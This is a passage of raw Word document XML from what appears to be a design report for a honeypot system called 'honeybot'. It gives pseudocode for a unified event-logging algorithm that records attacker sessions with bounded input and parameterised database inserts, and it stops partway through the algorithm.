        <w:t xml:space="preserve">The following tables document the core algorithms of the build. Each algorithm is derived directly from the implemented Python source code, with inputs, outputs and step-by-step logic. Algorithms A1–A8 are unchanged in v0.7 apart from the fixes listed in Section 1.7; the new workflows are modelled in Section 4.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9018" w:name="_Toc69018"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A1 – Unified Event Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9018"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="1C44353D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A1 Unified Event Logging (common/db.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="4728BCD6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> protocol, device, attacker ip/port; event type and fields from any honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="5AB6A575" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> one sessions row per connection, one events row per action, event published on Redis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="55E31788" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">class</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Session(protocol, device, ip, src_port, dst_port):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      id ← uuid4();  auth_attempts ← 0;  commands ← 0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      enqueue(INSERT INTO sessions (id, ip, ports, device, protocol, NOW()))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      log_event(self, "connect")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> log_event(session, event_type, user, pass, success, command, payload, raw):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      clip user/pass </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 256 chars, command/payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4000 chars   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// bound attacker input</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      enqueue(INSERT INTO events (...) VALUES (%s, ...))           </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// parameterised</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> redis.publish("honeybot:events", json(summary))  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">catch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: ignore</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> enqueue(kind, sql, params):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> writer thread </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> started </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> start writer()          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// once per process</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> queue is full </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> log error </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> drop  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">else</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> queue.put(kind, sql, params)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> writer():                                            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">// single background thread</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">while</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> true </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14:         batch ← [queue.get()] + up </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 199 more without waiting</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> attempt ← 1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">16:             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (kind, sql, params) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> batch </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
